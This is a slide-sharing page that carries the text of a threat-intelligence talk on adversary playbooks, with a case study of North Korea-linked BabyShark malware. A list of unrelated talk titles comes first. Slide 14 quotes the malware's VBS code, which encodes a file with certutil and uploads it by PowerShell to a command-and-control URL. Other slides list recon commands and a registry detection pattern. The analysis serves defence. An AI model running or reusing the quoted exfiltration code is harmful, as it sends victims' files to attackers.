TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 

Último (20)

MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 

The adversary playbook - the tools, techniques and procedures used by threat actors

  • 1. Unit 42 Adversary Playbooks Alex Hinchliffe Threat Intelligence Analyst
  • 2. Agenda • Introductions • Information sharing partnerships • Case study: BabyShark • Adversary Playbooks
  • 3. LIFE THE UNIVERSE EVERYTHING
  • 4. OUR MISSION ANALYZE THE DATA AVAILABLE TO PALO ALTO NETWORKS TO IDENTIFY ADVERSARIES, THEIR MOTIVATIONS, RESOURCES, AND TACTICS TO BETTER UNDERSTAND THE THREATS OUR CUSTOMERS FACE https://unit42.paloaltonetworks.com @Unit42_Intel
  • 5. Cyber Threat Alliance Charter Members: Affiliate Members: Contributing Members: 1. To share threat information in order to improve defenses against advanced cyber adversaries across member organizations and their customers. 2. To advance the cybersecurity of critical information technology infrastructures. 3. To increase the security, availability, integrity and efficiency of information systems.
  • 6. Mission… “Foster relationships with SOC, IR and CERT teams from customers, partners and organisations in EMEA to collaborate and share threat information.” 60+ Members… Threat Information Sharing Program (TISP)
  • 8. BabyShark “Top Trumps” Language VBS Debut year 2018 Key Interests Universities and Think-tanks Hobbies Espionage (related to nuclear security and Korean peninsula) Best friends KimJongRAT and STOLEN PENCIL Works for Kimsuky Group (aka Velvet Chollima, THALLIUM, Nickel Foxcroft) Special powers Cryptocurrency mining Family members 4
  • 9. ATTACK LIFE CYCLE RECON WEAPONIZATION DELIVERY INSTALLATION EXPLOITATIO N COMMAND & CONTROL OBJECTIVE
  • 10. WEAPONIZATION Excel Macro-Enabled Add-In file “Hamre-re-NK-deterrence-CWIR-19-Nov18.xlam”
  • 13. HKCUSoftwareMicrosoftOffice14.0ExcelSecurityVBAWarnings , value:1 whoami hostname ipconfig /all net user dir “%programfiles%”; “%programfiles% (x86)”; ……... tasklist ver set reg query “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault” INSTALLATION
  • 14. COMMAND & CONTROL retu=wShell.run(“certutil -f -encode “””&ttmp&””” “””&ttmp1&””””,0,true) retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile(‘https://tdalpacafarm [.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true)
  • 15. • Espionage related to nuclear security; • Espionage related to Korean peninsula’s national security issues; • Financial gain with focus on the cryptocurrency OBJECTIVE Command Name Description getfiles Archive all files in the BabyShark base path as a ZIP archive, then upload to the C2 exe_down Download further payloads redirect_vbs Possible C2 path change
  • 16. OBJECTIVE Command Name Description keyhook Start key loggers implemented using PowerShell (available on GitHub) or custom C# dir list Collect host information using: whoami, hostname, ipconfig, net user, arp -a, dir (various), vol and tasklist power com Load DLL component exe del Clean up all files associated with secondary payload execution execute Execute payloads
  • 18. ADVERSARY PLAYBOOK CONCEPT An Adversary's Playbook is the organized collection of the Techniques, Tactics and Procedures (TTP) they employ when launching cyber-attacks. As adversaries do not share their playbooks with defenders, we must derive them through observations of live attacks, shared information and intelligence analysis.
  • 19. Deconstructing the Attack Life Cycle COMMAND & CONTROL Custom Command and Control Fallback Channels Data Encoding
  • 20. 2.0
  • 21. STIX 2.0 Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence ATT&CK MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior A linear, phase- based process an adversary must complete to successfully execute an attack STIX 2.0ATT&CK ATTACK LIFE CYCLE PLAYBOOKS A method of organizing tactics, tools, and procedures adversaries used in a structured data format ATTACK LIFECYCLE
  • 22. ADVERSARY ATTACK LIFE CYCLE IDENTIFIED TACTICS INDICATORS PLAYBOOK PLAYS ATT&CK
  • 24. Obfuscate or encrypt code PowerShell Scripting mshta Hidden Files and Directories Logon Scripts windows-registry-key:key = 'HKCUSoftwareMicrosoftCommand ProcessorAutoRun' AND windows-registry-key:values[*].data LIKE '%powershell.exe%mshta%.hta%' INSTALLATION
  • 25. Standard Application Layer Protocol Data Encoding Remote File Copy BabyShark uses HTTPS for C2 domain-name:value = 'tdalpacafarm[.]com' COMMAND & CONTROL
  • 26. Campaign 1 Recon Weaponize Delivery Exploit Install C2 Act on Obj. Identify business relationships Acquire OSINT data sets and information Obtain templates/branding materials Acquire and/or use 3rd party infrastructure services Remote access tool development Install and configure hardware, network, and systems Obfuscate or encrypt code Obtain/re-use payloads Buy domain name Create custom payloads Conduct social engineering or HUMINT operation Spear phishing messages with malicious attachments Authorized user performs requested cyber action Hidden Files and Directories Process Injection Rundll32 Software Packing Scripting Remote File Copy Data Encoding Standard Application Layer Protocol Process Discovery Automated Collection Screen Capture Clipboard Data System Network Configuration Discovery File and Directory Discovery Logon Scripts Host-based hiding techniques Misattributable credentials Obtain/re-use payloads Buy domain name Create custom payloads Spear phishing messages with malicious attachments Authorized user performs requested cyber action Confirmation of launched compromise achieved Custom Cryptographic Protocol Standard Application Layer Protocol Commonly Used Port System Information Discovery Campaign 2
  • 27. Campaign 1 Recon Weaponize Delivery Exploit Install C2 Act on Obj. Identify business relationships Acquire OSINT data sets and information Obtain templates/branding materials Acquire and/or use 3rd party infrastructure services Remote access tool development Install and configure hardware, network, and systems Obfuscate or encrypt code Obtain/re-use payloads Buy domain name Create custom payloads Conduct social engineering or HUMINT operation Spear phishing messages with malicious attachments Authorized user performs requested cyber action Hidden Files and Directories Process Injection Rundll32 Software Packing Scripting Remote File Copy Data Encoding Standard Application Layer Protocol Process Discovery Automated Collection Screen Capture Clipboard Data System Network Configuration Discovery File and Directory Discovery Logon Scripts Host-based hiding techniques Misattributable credentials Obtain/re-use payloads Buy domain name Create custom payloads Spear phishing messages with malicious attachments Authorized user performs requested cyber action Confirmation of launched compromise achieved Custom Cryptographic Protocol Standard Application Layer Protocol Commonly Used Port System Information Discovery Campaign 2
  • 28.
  • 30. Defence #1 Defence #2 Defence #3 Defence Priorities Your Top 10 Adversaries Distinct TTPs Defences